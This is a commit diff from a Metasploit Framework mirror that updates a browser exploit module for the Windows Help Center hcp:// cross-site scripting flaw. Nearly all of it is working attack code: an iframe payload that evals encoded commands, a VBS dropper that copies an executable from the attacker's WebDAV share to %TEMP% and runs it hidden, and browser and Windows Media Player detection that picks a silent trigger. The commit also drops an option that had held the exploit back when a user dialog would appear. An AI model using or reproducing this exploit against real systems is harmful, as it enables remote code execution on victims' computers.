infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Bug fixes for WMP11 and IE8, new configurable setting for exploit trigger, and output cleanup. 

git-svn-id: file:///home/svn/framework3/trunk@9495 4d416f70-5f16-0410-b530-b9f4589650da
unstable
natron 2010-06-11 20:54:35 +00:00
parent 33212ae5ba
commit 7cbc566c7b
1 changed files with 49 additions and 51 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

100
modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb
View File

@ -19,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote
# #
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE include Msf::Exploit::EXE
include Msf::Exploit::CmdStagerVBS
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -30,13 +29,15 @@ class Metasploit3 < Msf::Exploit::Remote
directly via URLs by installing a protocol handler for the scheme "hcp". Due to directly via URLs by installing a protocol handler for the scheme "hcp". Due to
an error in validation of input to hcp:// combined with a local cross site an error in validation of input to hcp:// combined with a local cross site
scripting vulnerability and a specialized mechanism to launch the XSS trigger, scripting vulnerability and a specialized mechanism to launch the XSS trigger,
arbitrary command execution can be achieved. arbitrary command execution can be achieved.
On IE6 and IE7 on XP SP2 or SP3, code execution is automatic. On IE8, a dialog On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it
box pops, but if WMP9 is installed, WMP9 can be used for automatic execution. can be used to launch the exploit automatically. If IE8 and WMP11, either can
If IE8 and WMP11, a dialog box will ask the user if execution should continue. be used to launch the attack, but both pop dialog boxes asking the user if
Automatic detection of these options is implemented in this module, and will execution should continue. This exploit detects if non-intrusive mechanisms are
default to not sending the exploit for IE8/WMP11 unless the option is overridden. available and will use one if possible. In the case of both IE8 and WMP11, the
exploit defaults to using an iframe on IE8, but is configurable by setting the
DIALOGMECH option to "none" or "player".
}, },
'Author' => 'Author' =>
[ [
@ -63,20 +64,16 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], # Only automatic for now. [ 'Automatic', { } ]
#[ 'IE6/IE7', { 'trigger_method' => 'iframe' } ], # Only tested IE7 / XP SP2,3
#[ 'IE8/WMP9', { 'trigger_method' => 'asx' } ], # untested
#[ 'IE8/WMP11', { 'trigger_method' => 'asx' } ], # tested, pops dialog box
], ],
'DisclosureDate' => 'June 09, 2010', 'DisclosureDate' => 'June 09, 2010',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options( register_options(
[ [
#OptString.new( 'CMD', [ true, "The URI-encoded command to execute.", "calc.exe" ]),
OptBool.new( 'RUNWITHDIALOG', [ true, "Proceed with exploit even if it will pop a dialog to the user?", false]),
OptPort.new( 'SRVPORT', [ true, "The daemon port to listen on", 80 ]), OptPort.new( 'SRVPORT', [ true, "The daemon port to listen on", 80 ]),
OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ]) OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ]),
OptString.new( 'DIALOGMECH', [ true, "IE8/WMP11 trigger mechanism (none, iframe, or player).", "iframe"])
], self.class) ], self.class)
deregister_options('SSL', 'SSLVersion') # Just for now deregister_options('SSL', 'SSLVersion') # Just for now
@ -112,16 +109,12 @@ class Metasploit3 < Msf::Exploit::Remote
def process_get(cli, request) def process_get(cli, request)
#print_status("Responding to GET request from #{cli.peerhost}:#{cli.peerport}")
@my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] @my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}" webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}"
@url_base = "http://" + @my_host @url_base = "http://" + @my_host
if (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri)) if (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri))
print_status "GET for payload received." print_status "Sending payload executable to target ..."
return if ((p = regenerate_payload(cli)) == nil) return if ((p = regenerate_payload(cli)) == nil)
data = Msf::Util::EXE.to_win32pe(framework, p.encoded) data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
@ -130,20 +123,27 @@ class Metasploit3 < Msf::Exploit::Remote
return return
end end
if request.uri.match(/\.gif$/)
# "world's smallest gif"
data = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00!\xF9\x04\x01"
data += "\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
print_status "Sending gif image to WMP at #{cli.peerhost}:#{cli.peerport} ..."
send_response(cli, data, { 'Content-TYpe' => 'image/gif' } )
end
# ASX Request Inbound # ASX Request Inbound
if request.uri.match(/\.asx$/) if request.uri.match(/\.asx$/)
asx = %Q|<ASX VERSION="3.0"> asx = %Q|<ASX VERSION="3.0">
<PARAM name="HTMLView" value="URLBASE/STARTHELP"/> <PARAM name="HTMLView" value="URLBASE/STARTHELP"/>
<ENTRY> <ENTRY>
<REF href=""/> <REF href="URLBASE/IMGFILE"/>
</ENTRY> </ENTRY>
</ASX> </ASX>
| |
#<REF href="http://www.metasploit.com/images/icbm.jpg"/>
asx.gsub!(/URLBASE/, @url_base) asx.gsub!(/URLBASE/, @url_base)
asx.gsub!(/STARTHELP/, @random_dir + "/" + @start_help) asx.gsub!(/STARTHELP/, @random_dir + "/" + @start_help)
print_status("ASX file requested. Responding to #{cli.peerhost}:#{cli.peerport}...") asx.gsub!(/IMGFILE/, @random_dir + "/" + @img_file)
print_status("Sending asx file to #{cli.peerhost}:#{cli.peerport} ...")
send_response(cli, asx, { 'Content-Type' => 'text/html' }) send_response(cli, asx, { 'Content-Type' => 'text/html' })
return return
end end
@ -152,12 +152,8 @@ class Metasploit3 < Msf::Exploit::Remote
if request.uri.match(/#{@start_help}/) if request.uri.match(/#{@start_help}/)
help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">| help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">|
#help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">|
#help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27TASKKILL%27%29%29%3C/script%3E">|
# stolen from Rex::Text, modified to return fromCharCode happy numbers
rand_vbs = rand_text_alpha(rand(2)+1) + ".vbs" rand_vbs = rand_text_alpha(rand(2)+1) + ".vbs"
task_cmd = "taskkill /F /IM helpctr.exe"
copy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\#{@payload}^ copy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\#{@payload}^
vbs_content = %Q|WScript.CreateObject("WScript.Shell").Run "#{copy_launch}",0,false| vbs_content = %Q|WScript.CreateObject("WScript.Shell").Run "#{copy_launch}",0,false|
write_vbs = %Q|cmd /c echo #{vbs_content}>%TEMP%\\#{rand_vbs}| write_vbs = %Q|cmd /c echo #{vbs_content}>%TEMP%\\#{rand_vbs}|
@ -165,11 +161,9 @@ class Metasploit3 < Msf::Exploit::Remote
concat_cmds = "#{write_vbs}|#{launch_vbs}" concat_cmds = "#{write_vbs}|#{launch_vbs}"
eval_block = "Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));" eval_block = "Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));"
task_kill = "alert(\"foo\");"#"Run(String.fromCharCode(#{convert_to_char_code(task_cmd)}));"
eval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block)) eval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block))
help_html.gsub!(/COMMANDS/, eval_block) help_html.gsub!(/COMMANDS/, eval_block)
#help_html.gsub!(/TASKKILL/, task_kill) print_status("Sending exploit trigger to #{cli.peerhost}:#{cli.peerport} ...")
print_status("Responding to request for exploit iframe at #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, help_html, { 'Content-Type' => 'text/html' }) send_response(cli, help_html, { 'Content-Type' => 'text/html' })
return return
end end
@ -196,33 +190,23 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
// if ie8, check WMP version // if ie8, check WMP version
if (ver > 7) { if (ver > 7) {
//alert("IE8 detected. Checking WMP version.");
var o = document.createElement("OBJECT"); var o = document.createElement("OBJECT");
o.setAttribute("classid", "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6"); o.setAttribute("classid", "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6");
o.setAttribute("uiMode", "invisible"); o.setAttribute("uiMode", "invisible");
// if wmp9 // if wmp9, go ahead and launch
if( parseInt(o.versionInfo) < 10 ) { if( parseInt(o.versionInfo) < 10 ) {
//alert("WMP9 or below detected. Launching exploit.");
o.openPlayer(asx); o.openPlayer(asx);
// if > wmp9, but overridden via dialog // if > wmp9, only launch if user requests
} else { } else {
if( RUNWITHDIALOG ) { DIALOGMECH
//alert(">WMP9 detected but launching anyway.");
o.openPlayer(asx)
} else { //alert("IE8 with > WMP9 detected. Will not launch exploit.");
} }
// if ie7, use iframe
} else {
launchiframe(ifr);
} }
// if ie6 or 7, use iframe
} else { } else {
//alert("< IE8 detected. Launching via iframe.")
launchiframe(ifr);
}
} else {
//alert("Non-IE detected. Launching via iframe.");
// if other, try iframe // if other, try iframe
var o = document.createElement("IFRAME"); launchiframe(ifr);
o.setAttribute("src", ifr);
document.body.appendChild(o);
} }
| |
@ -232,17 +216,31 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
</body> </body>
</html> </html>
| |
case datastore['DIALOGMECH']
when "player"
mech = "o.openPlayer(asx);"
when "iframe"
mech = "launchiframe(ifr);"
when "none"
mech = ""
else
mech = ""
end
html.gsub!(/JAVASCRIPTFU/, js) html.gsub!(/JAVASCRIPTFU/, js)
html.gsub!(/DIALOGMECH/, mech)
html.gsub!(/URLBASE/, @url_base) html.gsub!(/URLBASE/, @url_base)
html.gsub!(/ASXFILE/, @random_dir + "/" + @asx_file) html.gsub!(/ASXFILE/, @random_dir + "/" + @asx_file)
html.gsub!(/IFRFILE/, @random_dir + "/" + @start_help) html.gsub!(/IFRFILE/, @random_dir + "/" + @start_help)
datastore['RUNWITHDIALOG'] ? override = "true" : override = "false" print_status("Sending exploit html to #{cli.peerhost}:#{cli.peerport} ...")
html.gsub!(/RUNWITHDIALOG/, override)
headers = {
'Content-Type' => 'text/html',
#'X-UA-Compatible' => 'IE=7'
}
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, headers)
send_response(cli, html, { 'Content-Type' => 'text/html' })
end end
# #
@ -324,7 +322,6 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
print_status("Sending 404 for #{path} ...") print_status("Sending 404 for #{path} ...")
send_not_found(cli) send_not_found(cli)
return return
end end
# send the response # send the response
@ -339,6 +336,7 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
@asx_file = rand_text_alpha(rand(2)+1) + ".asx" @asx_file = rand_text_alpha(rand(2)+1) + ".asx"
@start_help = rand_text_alpha(rand(2)+1) + ".html" @start_help = rand_text_alpha(rand(2)+1) + ".html"
@payload = rand_text_alpha(rand(2)+1) + ".exe" @payload = rand_text_alpha(rand(2)+1) + ".exe"
@img_file = rand_text_alpha(rand(2)+1) + ".gif"
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/' raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'